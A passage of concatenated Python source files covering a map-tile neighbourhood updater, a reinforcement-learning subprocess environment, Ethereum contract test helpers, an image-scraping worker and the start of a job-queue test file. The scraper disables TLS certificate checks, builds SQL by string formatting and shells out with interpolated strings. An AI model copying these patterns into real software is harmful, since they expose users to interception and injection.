self.zoom_until = 11
self.current_date = current_date
def __call__(self):
# perform IO to get old/new neighbourhoods and tiles of
# interest in parallel
# queues to pass the results through the threads
prev_neighbourhoods_queue = Queue.Queue(1)
meta_neighbourhoods_queue = Queue.Queue(1)
meta_microhoods_queue = Queue.Queue(1)
meta_macrohoods_queue = Queue.Queue(1)
meta_boroughs_queue = Queue.Queue(1)
toi_queue = Queue.Queue(1)
# functions for the threads
def find_prev_neighbourhoods():
prev_neighbourhoods = (
self.model.find_previous_neighbourhood_meta())
prev_neighbourhoods_queue.put(prev_neighbourhoods)
def make_fetch_meta_csv_fn(fn, queue):
neighbourhood_metas = list(fn())
queue.put(neighbourhood_metas)
def fetch_toi():
toi = self.redis_cache_index.fetch_tiles_of_interest()
toi_queue.put(toi)
self.logger.info('Fetching tiles of interest in background ...')
self.logger.info('Fetching old and new neighbourhoods ...')
# start the threads in parallel
prev_neighbourhoods_thread = threading.Thread(
target=find_prev_neighbourhoods)
prev_neighbourhoods_thread.start()
meta_neighbourhoods_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_neighbourhoods,
meta_neighbourhoods_queue))
meta_neighbourhoods_thread.start()
meta_microhoods_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_microhoods,
meta_microhoods_queue))
meta_microhoods_thread.start()
meta_macrohoods_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_macrohoods,
meta_macrohoods_queue))
meta_macrohoods_thread.start()
meta_boroughs_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_boroughs,
meta_boroughs_queue))
meta_boroughs_thread.start()
toi_thread = threading.Thread(target=fetch_toi)
toi_thread.start()
# ensure we're done with finding the next and previous
# neighbourhoods by this point
prev_neighbourhoods_thread.join()
meta_neighbourhoods_thread.join()
meta_microhoods_thread.join()
meta_macrohoods_thread.join()
meta_boroughs_thread.join()
self.logger.info('Fetching old and new neighbourhoods ... done')
prev_neighbourhoods = prev_neighbourhoods_queue.get()
meta_neighbourhoods = meta_neighbourhoods_queue.get()
meta_microhoods = meta_microhoods_queue.get()
meta_macrohoods = meta_macrohoods_queue.get()
meta_boroughs = meta_boroughs_queue.get()
# each of these has the appropriate placetype set now
meta_neighbourhoods = (
meta_neighbourhoods + meta_microhoods + meta_macrohoods +
meta_boroughs)
self.logger.info('Diffing neighbourhoods ...')
by_neighborhood_id = attrgetter('wof_id')
# the model is expected to return records in ascending order by id
# it doesn't seem like the neighbourhoods in the wof csv
# are in ascending order, so we sort explicitly here
meta_neighbourhoods.sort(key=by_neighborhood_id)
# the diff algorithm depends on the neighbourhood lists
# being in sorted order by id
diffs = diff_neighbourhoods(prev_neighbourhoods,
meta_neighbourhoods)
self.logger.info('Diffing neighbourhoods ... done')
# we need to fetch neighbourhoods that have either been
# updated or are new
wof_neighbourhoods_to_fetch = []
# based on the diff, we'll need to keep track of how we'll
# need to update
ids_to_add = set()
ids_to_update = set()
ids_to_remove = set()
for dx, dy in diffs:
if dy is not None:
if dx is None:
ids_to_add.add(dy.wof_id)
else:
ids_to_update.add(dy.wof_id)
wof_neighbourhoods_to_fetch.append(dy)
else:
ids_to_remove.add(dx.wof_id)
if wof_neighbourhoods_to_fetch:
self.logger.info('Fetching %d raw neighbourhoods ...' %
len(wof_neighbourhoods_to_fetch))
raw_neighbourhoods, failures = (
self.fetcher.fetch_raw_neighbourhoods(
wof_neighbourhoods_to_fetch))
self.logger.info('Fetching %d raw neighbourhoods ... done' %
len(wof_neighbourhoods_to_fetch))
else:
self.logger.info('No raw neighbourhoods found to fetch')
raw_neighbourhoods = ()
failures = []
# we should just remove any neighbourhoods from add/update lists
# also keep track of these ids to remove from the diffs too
failed_wof_ids = set()
superseded_by_wof_ids = set()
funky_wof_ids = set()
for failure in failures:
failure_wof_id = failure.wof_id
log_failure(self.logger, failure)
if failure.funky:
# this scenario is triggered for new neighbourhoods,
# or if a neighbourhood became funky
# we handle both of these scenarios in tests later on,
# but for now we just track the id of the funky
# neighbourhoods
funky_wof_ids.add(failure_wof_id)
if failure.superseded:
self.logger.warn(
'superseded_by inconsistency for %s' % failure_wof_id)
# this means that we had a value for superseded_by in
# the raw json, but not in the meta file
# this should get treated as a removal
superseded_by_wof_ids.add(failure_wof_id)
failed_wof_ids.add(failure_wof_id)
ids_to_add.discard(failure_wof_id)
ids_to_update.discard(failure_wof_id)
# we'll only log the number of funky records that we found
if funky_wof_ids:
self.logger.warn('Number of funky neighbourhoods: %d' %
len(funky_wof_ids))
# now we'll want to ensure that the failed ids are not present
# in any additions or updates
new_diffs = []
for n1, n2 in diffs:
if n2 is None or n2.wof_id not in failed_wof_ids:
new_diffs.append((n1, n2))
diffs = new_diffs
# and we'll want to also treat any superseded_by
# inconsistencies as removals
# but we need the original neighbourhood meta object to
# generate the diff, for its label position to expire the
# appropriate tile
if superseded_by_wof_ids:
for n in prev_neighbourhoods:
if n.wof_id in superseded_by_wof_ids:
ids_to_remove.add(n.wof_id)
diffs.append((n, None))
# if the neighbourhood became funky and we had it in our
# existing set, we'll want to remove it
if funky_wof_ids:
for n in prev_neighbourhoods:
if n.wof_id in funky_wof_ids:
ids_to_remove.add(n.wof_id)
diffs.append((n, None))
sync_neighbourhoods_thread = None
if diffs:
self.logger.info("Sync'ing neighbourhoods ...")
# raw_neighbourhoods contains both the neighbourhoods to
# add and update
# we split it up here
neighbourhoods_to_update = []
neighbourhoods_to_add = []
for neighbourhood in raw_neighbourhoods:
if neighbourhood.wof_id in ids_to_add:
neighbourhoods_to_add.append(neighbourhood)
elif neighbourhood.wof_id in ids_to_update:
neighbourhoods_to_update.append(neighbourhood)
else:
assert 0, '%d should have been found to add or update' % (
neighbourhood.wof_id)
if neighbourhoods_to_add:
self.logger.info('Inserting neighbourhoods: %d' %
len(neighbourhoods_to_add))
if neighbourhoods_to_update:
self.logger.info('Updating neighbourhoods: %d' %
len(neighbourhoods_to_update))
if ids_to_remove:
self.logger.info('Removing neighbourhoods: %d' %
len(ids_to_remove))
def _sync_neighbourhoods():
self.model.sync_neighbourhoods(
neighbourhoods_to_add, neighbourhoods_to_update,
ids_to_remove)
sync_neighbourhoods_thread = threading.Thread(
target=_sync_neighbourhoods)
sync_neighbourhoods_thread.start()
else:
self.logger.info('No diffs found, no sync necessary')
if diffs:
self.logger.info('Generating tile expiry list ...')
expired_coord_ints = generate_tile_expiry_list(
self.zoom_expiry, diffs)
self.logger.info(
'Generating tile expiry list ... done - '
'Found %d expired tiles' % len(expired_coord_ints))
else:
self.logger.info('No diffs found, not generating expired coords')
expired_coord_ints = set()
# ensure we're done fetching the tiles of interest by this point
toi_thread.join()
toi = toi_queue.get()
self.logger.info('Have tiles of interest')
# we need to finish sync'ing neighbourhoods before we flip the
# visibility flag and enqueue coordinates
if sync_neighbourhoods_thread is not None:
sync_neighbourhoods_thread.join()
self.logger.info("Sync'ing neighbourhoods ... done")
# update the current timestamp, returning the list of coords that
# have changed visibility.
visibility_updates = \
self.model.update_visible_timestamp(
self.zoom_expiry, self.current_date)
self.logger.info('Have %d tile expiries from visibility changes.'
% len(visibility_updates))
expired_coord_ints.update(visibility_updates)
if diffs:
# intersect the tiles of interest with the expired coords from
# the neighbourhood diff
self.logger.info('Intersecting %d tiles of interest with %d '
'expired tiles' % (
len(toi), len(expired_coord_ints)))
toi_expired_coord_ints, _ = self.intersector(
expired_coord_ints, toi, self.zoom_until)
coords = map(coord_unmarshall_int, toi_expired_coord_ints)
self.logger.info('Intersection complete, will expire %d tiles' %
len(coords))
else:
self.logger.info('No diffs found, no need to intersect')
coords = ()
if coords:
self.logger.info('Asking enqueuer to enqueue %d coords ...' %
len(coords))
self.rawr_enqueuer(coords)
self.logger.info('Asking enqueuer to enqueue %d coords ... done' %
len(coords))
else:
self.logger.info('No expired tiles to enqueue')
class WofInitialLoader(object):
def __init__(self, fetcher, model, logger):
self.fetcher = fetcher
self.model = model
self.logger = logger
def __call__(self):
self.logger.info('Fetching meta neighbourhoods csv ...')
neighbourhood_metas = list(self.fetcher.fetch_meta_neighbourhoods())
self.logger.info('Fetching meta neighbourhoods csv ... done')
self.logger.info('Fetching meta microhoods csv ...')
microhood_metas = list(self.fetcher.fetch_meta_microhoods())
self.logger.info('Fetching meta microhoods csv ... done')
self.logger.info('Fetching meta macrohoods csv ...')
macrohood_metas = list(self.fetcher.fetch_meta_macrohoods())
self.logger.info('Fetching meta macrohoods csv ... done')
self.logger.info('Fetching meta boroughs csv ...')
borough_metas = list(self.fetcher.fetch_meta_boroughs())
self.logger.info('Fetching meta boroughs csv ... done')
neighbourhood_metas = (
neighbourhood_metas + microhood_metas + macrohood_metas +
borough_metas)
self.logger.info('Fetching raw neighbourhoods ...')
neighbourhoods, failures = self.fetcher.fetch_raw_neighbourhoods(
neighbourhood_metas)
for failure in failures:
log_failure(self.logger, failure)
self.logger.info('Fetching raw neighbourhoods ... done')
self.logger.info('Inserting %d neighbourhoods ...' %
len(neighbourhoods))
self.model.insert_neighbourhoods(neighbourhoods)
self.logger.info('Inserting %d neighbourhoods ... done' %
len(neighbourhoods))
def make_wof_url_neighbourhood_fetcher(
neighbourhood_url, microhood_url, macrohood_url, borough_url,
data_prefix_url, n_threads, max_retries):
fetcher = WofUrlNeighbourhoodFetcher(
neighbourhood_url, microhood_url, macrohood_url, borough_url,
data_prefix_url, n_threads, max_retries)
return fetcher
def make_wof_filesystem_neighbourhood_fetcher(wof_data_path, n_threads):
fetcher = WofFilesystemNeighbourhoodFetcher(
wof_data_path, n_threads)
return fetcher
def make_wof_model(postgresql_conn_info):
wof_model = WofModel(postgresql_conn_info)
return wof_model
def make_wof_processor(
fetcher, model, redis_cache_index, rawr_enqueuer, logger,
current_date):
from tilequeue.command import explode_and_intersect
wof_processor = WofProcessor(
fetcher, model, redis_cache_index, explode_and_intersect,
rawr_enqueuer, logger, current_date)
return wof_processor
def make_wof_initial_loader(fetcher, model, logger):
wof_loader = WofInitialLoader(fetcher, model, logger)
return wof_loader
|
subproc.py
|
# --- built in ---
import os
import sys
import enum
import time
import logging
import multiprocessing
from typing import Union
# --- 3rd party ---
import gym
import numpy as np
import cloudpickle
# --- my module ---
from unstable_baselines.lib import utils as ub_utils
from unstable_baselines.lib.envs.vec import base as vec_base
__all__ = [
'SubprocVecEnv'
]
class CloudpickleWrapper():
def __init__(self, **kwargs):
self.kwargs = kwargs
def __getattr__(self, key):
return self.kwargs.get(key)
def __getstate__(self):
return cloudpickle.dumps(self.kwargs)
def __setstate__(self, kwargs):
self.kwargs = cloudpickle.loads(kwargs)
# Commands
class CMD:
getattr = 1
setattr = 2
reset = 3
step = 4
seed = 5
render = 6
close = 7
def _subproc_worker(_p, p, param_wrapper):
_p.close()
env = param_wrapper.fn()
auto_reset = param_wrapper.auto_reset
try:
while True:
try:
cmd, data = p.recv()
except EOFError: # the pipe has been closed
p.close()
break
if cmd == CMD.getattr:
p.send(getattr(env, data[0], None))
elif cmd == CMD.setattr:
p.send(setattr(env, data[0], data[1]))
elif cmd == CMD.reset:
p.send(env.reset(**data[0]))
elif cmd == CMD.step:
obs, rew, done, info = env.step(data[0])
if auto_reset and done:
obs = env.reset()
p.send((obs, rew, done, info))
elif cmd == CMD.seed:
p.send(env.seed(data[0]))
elif cmd == CMD.render:
p.send(env.render(**data[0]))
elif cmd == CMD.close:
p.send(env.close())
p.close()
break
else:
p.close()
raise NotImplementedError
except KeyboardInterrupt:
p.close()
class SubprocEnvWorker(vec_base.BaseEnvWorker):
def __init__(self, env_fn, auto_reset: bool):
methods = multiprocessing.get_all_start_methods()
start_method = 'spawn'
if 'forkserver' in methods:
start_method = 'forkserver'
ctx = multiprocessing.get_context(start_method)
self.p, _p = ctx.Pipe()
args = (
self.p, _p, CloudpickleWrapper(fn=env_fn, auto_reset=auto_reset)
)
self.process = ctx.Process(target=_subproc_worker, args=args, daemon=True)
self.process.start()
self._waiting_cmd = None
_p.close()
super().__init__(env_fn, auto_reset)
def getattr(self, attrname: str):
return self._cmd(CMD.getattr, attrname)
def setattr(self, attrname: str, value):
return self._cmd(CMD.setattr, attrname, value)
def reset(self, **kwargs):
return self._cmd(CMD.reset, kwargs)
def step_async(self, act):
return self._cmd(CMD.step, act, wait=False)
def step_wait(self):
return self._wait(CMD.step)
def seed(self, seed):
super().seed(seed)
return self._cmd(CMD.seed, seed)
def render(self, **kwargs):
return self._cmd(CMD.render, kwargs)
def close_async(self):
return self._cmd(CMD.close, wait=False)
def close_wait(self):
return self._wait(CMD.close, timeout=1)
def _cmd(self, cmd, *args, wait=True):
#TODO: find a more reliable way
if self._waiting_cmd and cmd != CMD.close:
raise RuntimeError(f'Another command {cmd} was sent when '
f'waiting for the reply {self._waiting_cmd}')
self.p.send([cmd, args])
self._waiting_cmd = cmd # marked as waiting reply
if wait:
return self._wait(cmd)
def _wait(self, cmd, timeout=None):
if self._waiting_cmd != cmd:
raise RuntimeError
res = None
if self.p.poll(timeout):
res = self.p.recv()
self._waiting_cmd = None #unmarked
return res
class SubprocVecEnv(vec_base.BaseVecEnv):
def __init__(self,
env_fns: list,
rms_norm: Union[str, bool, ub_utils.RMSNormalizer] = False,
auto_reset: bool = True,
):
super().__init__(env_fns, SubprocEnvWorker, rms_norm, auto_reset)
|
utils.py
|
import web3
import solc
import time
import threading
import hashlib
import os
w3 = None
cache = {}
def connect():
global w3
if w3 is None or not w3.isConnected:
# large request timeout require for performance tests
w3 = web3.Web3(web3.HTTPProvider('http://127.0.0.1:8545', request_kwargs={'timeout': 60 * 10}))
assert w3.isConnected
return w3
def filehash(path):
with open(path, 'rb') as f:
return hashlib.md5(f.read()).hexdigest()
def compile_contract(contract_name):
""" compiles the given contract (from the ./contracts folder)
and returns its ABI interface
"""
path = os.getcwd()
if path.endswith('client'):
path = f'../contracts/{contract_name}.sol'
else:
path = f'./contracts/{contract_name}.sol'
h = filehash(path)
interface = cache.get(h)
if interface:
return interface
with open(path) as f:
src = f.read()
for i in solc.compile_source(src, optimize=True).values():
interface = i
break
cache[h] = interface
return interface
def get_contract(contract_name, contract_address, patch_api=True):
""" gets the instance of an already deployed contract
if patch_api is set, all transactions are automatically syncronized, unless wait=False is specified in the tx
"""
connect()
interface = compile_contract(contract_name)
instance = w3.eth.contract(
address=contract_address,
abi=interface['abi'],
ContractFactoryClass=web3.contract.ConciseContract,
)
if patch_api:
for name, func in instance.__dict__.items():
if isinstance(func, web3.contract.ConciseMethod):
instance.__dict__[name] = _tx_executor(func)
# add event handling stuff to the instance object
contract = w3.eth.contract(abi=interface['abi'], bytecode=interface['bin'])
instance.eventFilter = contract.eventFilter
instance.events = contract.events
return instance
def _tx_executor(contract_function):
""" modifies the contract instance interface function such that whenever a transaction is performed
it automatically waits until the transaction in included in the blockchain
(unless wait=False is specified, in the case the default the api acts as usual)
"""
def f(*args, **kwargs):
wait = kwargs.pop('wait', True)
if 'transact' in kwargs and wait:
tx_hash = contract_function(*args, **kwargs)
tx_receipt = w3.eth.waitForTransactionReceipt(tx_hash)
return tx_receipt
return contract_function(*args, **kwargs)
return f
def deploy_contract(
contract_name, account=None, patch_api=True, return_tx_receipt=False
):
""" compiles and deploy the given contract (from the ./contracts folder)
returns the contract instance
"""
connect()
if account is None:
account = w3.eth.accounts[-1]
interface = compile_contract(contract_name)
contract = w3.eth.contract(abi=interface['abi'], bytecode=interface['bin'])
# increase max gas t
# tx_hash = contract.constructor().transact({'from': account, 'gas': 7_500_000})
tx_hash = contract.constructor().transact({'from': account, 'gas': 5_000_000})
tx_receipt = w3.eth.waitForTransactionReceipt(tx_hash)
c = get_contract(contract_name, tx_receipt['contractAddress'], patch_api)
if return_tx_receipt:
return c, tx_receipt
return c
def flatten(list_of_lists):
return [y for x in list_of_lists for y in x]
def get_events(contract_instance, event_name, from_block=0, to_block=None):
# eventFilter = contract.eventFilter(event_name, {'fromBlock': 0})
eventFilter = contract_instance.events.__dict__[event_name].createFilter(
fromBlock=from_block, toBlock=to_block
)
return [
e
for e in eventFilter.get_all_entries()
if e.address == contract_instance.address
]
def wait_for(predicate, check_interval=1.0):
while not predicate():
time.sleep(check_interval)
def mine_block():
connect()
w3.providers[0].make_request('evm_mine', params='')
def mine_blocks(num_blocks):
for i in range(num_blocks):
mine_block()
def mine_blocks_until(predicate):
while not predicate():
mine_block()
def blockNumber():
connect()
return w3.eth.blockNumber
def run(func_or_funcs, args=()):
""" executes the given functions in parallel and waits
until all execution have finished
"""
threads = []
if isinstance(func_or_funcs, list):
funcs = func_or_funcs
for i, f in enumerate(funcs):
arg = args[i] if isinstance(args, list) else args
if (arg is not None) and (not isinstance(arg, tuple)):
arg = (arg,)
threads.append(threading.Thread(target=f, args=arg))
else:
func = func_or_funcs
assert isinstance(args, list)
for arg in args:
xarg = arg if isinstance(arg, tuple) else (arg,)
threads.append(threading.Thread(target=func, args=xarg))
for t in threads:
t.start()
for t in threads:
t.join()
|
dbdlml.py
|
'''
Encoding image analyzing errors: Add the numbers below to 8 to encode all types of errors (so status=9...23 is reserved to describe the errors)
- general exception: 1
- bad format: 2
- image too big: 4
- image too small: 8
- any combination of above
'''
import gc
import os
import ssl
import sys
import time
import trio
import uuid
import ujson
import shutil
import tarfile
import pandas as pd
from glob import glob
from uuid import uuid1
from io import BytesIO
from datetime import datetime
from sqlalchemy import create_engine
from configparser import ConfigParser
from PIL import Image, ImageFile, UnidentifiedImageError
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem
from multiprocessing import Process, cpu_count
sys.path.append('./crawlingathome-worker/')
import asks
asks.init("trio")
ImageFile.LOAD_TRUNCATED_IMAGES = True # https://stackoverflow.com/a/47958486
ssl_ctx = ssl.create_default_context()
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
def config(filename='database.ini', section='cah_production'):
# create a parser
parser = ConfigParser()
# read config file
parser.read(filename)
# get section, default to postgresql
db = {}
if parser.has_section(section):
params = parser.items(section)
for param in params:
db[param[0]] = param[1]
else:
raise Exception('Section {0} not found in the {1} file'.format(section, filename))
return db
class Tracer(trio.abc.Instrument):
def __init__(self):
self.exceptions = 0
self.requests = 0
self.downloads = 0
self.imgproc_duration = 0
self.download_duration = 0
self.error_duration = 0
def task_exited(self, task):
if task.custom_sleep_data is not None:
if task.custom_sleep_data[0] in [1, 3]: # this is exception
self.exceptions += 1
self.error_duration += task.custom_sleep_data[2]
if task.custom_sleep_data[0] == 0: # this is image downloaded
self.download_duration += task.custom_sleep_data[1]
self.imgproc_duration += task.custom_sleep_data[2]
self.downloads += 1
def after_run(self):
rate = round(self.exceptions / (self.exceptions + self.downloads + sys.float_info.epsilon), 2)
avg_download = round(self.download_duration / (self.downloads + sys.float_info.epsilon), 2)
avg_process = round(self.imgproc_duration / (self.downloads + sys.float_info.epsilon), 2)
avg_error = round(self.error_duration / (self.exceptions + sys.float_info.epsilon), 2)
print(f"[instrumentation] While scraping there were {self.exceptions} errors within {self.downloads + self.exceptions} candidates (error rate = {round(rate * 100,2)} %). {self.downloads} images were downloaded.")
print(f"[instrumentation] Cumulative image processing duration {round(self.imgproc_duration, 2)} s.")
print(f"[instrumentation] Average downloading time {avg_download} s/img, image processing time {avg_process} s/img, exceptions processing time {avg_error} s/link")
def log(e):
with open("errors.txt","a") as f:
f.write(str(e.__class__.__name__) + " " + str(e) + "\n")
def process_img_content(response, alt_text, license, sample_id, language, i):
"""
Function to process downloaded image. Use use PIL from pillow-simd
(faster than open cv that in return is faster than original pillow)
input: web request response, ALT text, license and sample id
output: list of image parameters or None if image is rejected
"""
img_output_folder = f"./{i}/save/images/"
error_code = 8
#temp 2 lines
if language == "" or language is None:
language = "en"
def _resize(im: Image):
width, height = im.size
ratio = min(width, height) / 224
new_width = int(round(width/ratio,0))
new_height = int(round(height/ratio,0))
im = im.resize((new_width, new_height), resample=Image.BICUBIC)
if new_width > 224 or new_height > 224:
left = (new_width - 224)/2
top = (new_height - 224)/2
right = (new_width + 224)/2
bottom = (new_height + 224)/2
# Crop the center of the image
im = im.crop((left, top, right, bottom))
return im
try:
# reject too small images
if len(response.content) < 5000:
error_code += 8
img_data = BytesIO(response.content)
with Image.open(img_data) as im:
width, height = im.size
# reject if too large (might be a DOS decompression bomb)
if width * height > 89478484:
error_code += 4
im_format = im.format
out_fname = f"{img_output_folder}{str(sample_id)}.{im_format.lower()}"
# reject if format is not in this list
if im_format not in ["JPEG", "JPG", "PNG", "WEBP"]:
error_code += 2
if min(width, height) > 224:
im = _resize(im)
# convert all images to RGB (necessary for CLIP, also CLIP is doing it again so do we need it here?)
if im.mode != "RGB":
im = im.convert("RGB")
if error_code == 8:
im.save(out_fname) # do not retain images we do not need
except (KeyError, UnidentifiedImageError):
out_fname = ""
width = 0
height = 0
error_code += 1
if error_code == 8:
error_code = 2 # mark succesful lines with status = 2
return [str(sample_id), out_fname, response.url, alt_text, width, height, license, language, error_code]
async def request_image(parsed_df, i):
"""
This function initiates many parallel async connections to try download the images from provided links
input: dataset of validated links, the sample id to start with
output: list of lists with succesfully downloaded images and their parameters. this list is dumped on disk as json file
"""
tmp_data = []
limit = trio.CapacityLimiter(1000)
# change the number of parallel connections based on CPU speed, network capabilities, etc.
# the number of 192 is optimized for 1 vCPU droplet at Hetzner Cloud (code CX11)
session = asks.Session(connections=64, ssl_context=ssl_ctx)
software_names = [SoftwareName.CHROME.value]
operating_systems = [OperatingSystem.LINUX.value]
user_agent_rotator = UserAgent(software_names=software_names, operating_systems=operating_systems, limit=2000)
user_agent = user_agent_rotator.get_random_user_agent()
# try to make the bot website friendly
session.headers = {
"User-Agent": user_agent,
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Referer": "https://google.com",
"DNT": "1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
}
async def _request(row, i):
start=time.time()
sample_id = row[0]
url = row[1]
alt_text = row[2]
license = row[3]
language = row[4]
# the following 2 lines are related to Trio Instrument to capture events from multiple threads
task = trio.lowlevel.current_task()
try:
response = await session.get(url, timeout=10, connection_timeout=20)
dltime = round(time.time()-start, 2)
start=time.time()
proces = process_img_content(
# tune timeout and connection_timeout to grab more or less files. shorter timeouts will exclude bad performing websites
response, alt_text, license, sample_id, language, i
)
proctime = round(time.time()-start, 2)
task.custom_sleep_data = (0, dltime, proctime) # for success do not count errors
if proces is not None:
tmp_data.append(proces)
except Exception as e:
log(e)
task.custom_sleep_data = (1, 0, round(time.time()-start,2)) # when exception is hit, count it
async with trio.open_nursery() as n:
for index, row in parsed_df.iterrows():
async with limit:
n.start_soon(_request, row, i)
# trio makes sure at this point all async tasks were executed
with open(f"./{i}/.tmp/{uuid1()}.json", "w") as f:
ujson.dump(tmp_data, f)
gc.collect()
return
def dl_wat(parsed_df, i): # replace valid data and start sampleid with parsed_df
"""
This function initiates download attempt of validated parsed links
It launches multithreaded tasks by using trio module
input: dataset of validated links, the sample id to start with
output: dataframe of downloaded images and their parameters
"""
# Download every image available
processed_samples = []
#trio.run(request_image, valid_data, first_sample_id, instruments=[TrioProgress(len(valid_data), False)] )
trio.run( request_image, parsed_df, i, instruments=[Tracer()] )
for tmpf in glob(f"./{i}/.tmp/*.json"):
processed_samples.extend(ujson.load(open(tmpf)))
return pd.DataFrame(
processed_samples,
columns=["SAMPLE_ID", "PATH", "URL", "TEXT", "HEIGHT", "WIDTH", "LICENSE", "LANGUAGE", "STATUS"],
)
def upload(source: str, clientType: str, target: str):
with tarfile.open(f"{source}.tar.gz", "w:gz") as tar:
tar.add(source, arcname=os.path.basename(source))
result = os.system(f"rsync -av {source}.tar.gz {target}")
if os.path.exists(f"{source}.tar.gz"):
os.remove(f"{source}.tar.gz")
if os.path.exists(f"{source}"):
shutil.rmtree(f"{source}", ignore_errors=True)
return result
def newJob(engine):
# strict selection of distinct domains
#select_stmt1 = "UPDATE dataset SET status = 1 WHERE sampleid IN (SELECT DISTINCT ON (domain) sampleid FROM (SELECT domain, sampleid FROM dataset TABLESAMPLE SYSTEM (0.05) WHERE status = 0 LIMIT 1000000 FOR UPDATE SKIP LOCKED) as \"U\" LIMIT 10000) AND status = 0 RETURNING sampleid"
# selection on domains based on distribution of URLs per domain
select_stmt1 = "UPDATE dataset_intl SET status = 1 WHERE sampleid IN (SELECT sampleid FROM dataset_intl WHERE status = 0 and language != 'en' LIMIT 10000 FOR UPDATE SKIP LOCKED) AND status = 0 RETURNING sampleid"
conn = engine.raw_connection()
cur = conn.cursor()
cur.execute(select_stmt1)
result = cur.fetchall()
conn.commit()
cur.close()
values = ",".join([str(tuple[0]) for tuple in result])
select_stmt2 = "SELECT sampleid, url, text, license, language FROM dataset_intl WHERE sampleid in ({})".format(values)
#select_stmt2 = "UPDATE dataset_en SET status = 1 WHERE sampleid IN (SELECT sampleid FROM dataset_en TABLESAMPLE SYSTEM (0.1) WHERE status = 0 LIMIT 10000 FOR UPDATE SKIP LOCKED) AND status = 0 RETURNING sampleid, url, text, license, language"
df = pd.read_sql_query(select_stmt2, conn)
conn.close()
return df
def completeJob2(engine, prefix, parsed_df, dlparse_df):
# prepare data for EN
values2 = ",".join(parsed_df["sampleid"].astype(str))
update_stmt1 = ""
for i, row in dlparse_df.iterrows():
update_stmt1 += "UPDATE dataset_intl SET status={}, width={}, height={} where sampleid = {};".format(row["STATUS"],row["HEIGHT"],row["WIDTH"],row["SAMPLE_ID"])
# this is intentional mix between width and heigth to account for the but in previous laion release
# the csv will go scrambled but in database we want good values
insert_stmt = "INSERT INTO jobs_intl (jobid) VALUES ('{}')".format(prefix)
if len(dlparse_df.index > 0):
conn = engine.raw_connection()
cur = conn.cursor()
cur.execute(update_stmt1)
cur.execute(insert_stmt)
conn.commit()
cur.close()
conn.close()
# in case there are samples unaccounted for, we try to mark them with general error status
update_stmt2 = "UPDATE dataset_intl SET status = 9 where status = 1 AND sampleid in ({})".format(values2)
conn = engine.raw_connection()
cur = conn.cursor()
cur.execute(update_stmt2)
conn.commit()
cur.close()
conn.close()
return
def worker(engine, params, i):
# initialize working folders
tmp_folder = f"./{i}/.tmp/"
output_folder = f"./{i}/save/"
img_output_folder = output_folder + "images/"
while True:
try:
start = time.time()
start0 = start
parsed_df = newJob(engine)
prefix = uuid.uuid4().hex
result = 0
# clear working folders for a new job
if os.path.exists(output_folder):
shutil.rmtree(output_folder, ignore_errors=True)
if os.path.exists(tmp_folder):
shutil.rmtree(tmp_folder, ignore_errors=True)
os.makedirs(output_folder)
os.makedirs(img_output_folder)
os.makedirs(tmp_folder)
# compute output file names base
out_fname = f"3_staged_workflow_job_{prefix}_full_wat"
print(f"[{datetime.now().strftime('%H:%M:%S')} stats {i}] Job acquired in {round(time.time()-start,2)} sec")
start = time.time()
print (f"[{datetime.now().strftime('%H:%M:%S')} stats {i}] This job has {len(parsed_df)} candidates")
# attempt to download validated links and save to disk for stats and blocking lists
dlparse_df = dl_wat(parsed_df, i)
dlparse_df_save = dlparse_df[dlparse_df["STATUS"]==2] # remove rejected items from gpu jobs
dlparse_df_save.to_csv(output_folder + out_fname + ".csv", index=False, sep="|")
# at this point we finishes the CPU node job, need to make the data available for GPU worker
os.mkdir(prefix)
os.system(f"mv ./{i}/save/* {prefix}/")
result += upload(prefix, "CPU", "archiveteam@176.9.4.150::gpujobsml") #todo find the IP and endpoint
if result == 0:
completeJob2(engine, prefix, parsed_df, dlparse_df)
print (f"[{datetime.now().strftime('%H:%M:%S')} stats {i}] pairs retained {len(dlparse_df_save)} in {round(time.time() - start, 2)}")
print (f"[{datetime.now().strftime('%H:%M:%S')} stats {i}] scraping efficiency {len(dlparse_df_save)/(time.time() - start)} img/sec")
print (f"[{datetime.now().strftime('%H:%M:%S')} stats {i}] crawling efficiency {len(parsed_df)/(time.time() - start)} links/sec")
last = round(time.time() - start0)
print(f"[{datetime.now().strftime('%H:%M:%S')} stats {i}] Job completed in {last} seconds")
except Exception as e:
print (e)
print (f"{datetime.now().strftime('%H:%M:%S')} Worker {i} crashed")
time.sleep(60)
if __name__ == "__main__":
print (f"starting session")
procs = cpu_count()
params = config()
engine = create_engine(f'postgresql://{params["user"]}:{params["password"]}@{params["host"]}:5432/{params["database"]}', pool_size=procs, max_overflow=int(procs*1.5), pool_recycle=60, pool_pre_ping=True )
for i in range(1):
Process(target=worker, args=[engine, params, i], daemon=True).start()
try:
while True:
time.sleep(30)
except KeyboardInterrupt:
sys.exit()
|
test_worker.py
|
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import os
import shutil
import signal
import subprocess
import sys
import time
import zlib
from datetime import datetime, timedelta, timezone
from multiprocessing import Process
from time import sleep
from unittest import skipIf
import pytest
import mock
from mock import Mock
from tests import RQTestCase, slow
from tests.fixtures import (
access_self, create_file, create_file_after_timeout, div_by_zero, do_nothing,
kill_worker, long_running_job, modify_self, modify_self_and_error,
run_dummy_heroku_worker, save_key_ttl, say_hello, say_pid,
)
from rq import Queue, SimpleWorker, Worker, get_current_connection
from rq.compat import as_text, PY2
from rq.job import Job, JobStatus, Retry
from rq.registry import StartedJobRegistry, FailedJobRegistry, FinishedJobRegistry
from rq.suspension import resume, suspend
from rq.utils import utcnow
from rq.version import VERSION
from rq.worker import HerokuWorker, WorkerStatus
class CustomJob(Job):
pass
class CustomQueue(Queue):
pass
class TestWorker(RQTestCase):
def test_create_worker(self):
"""Worker creation using various inputs."""
# With single string argument
w = Worker('foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of strings
w = Worker(['foo', 'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
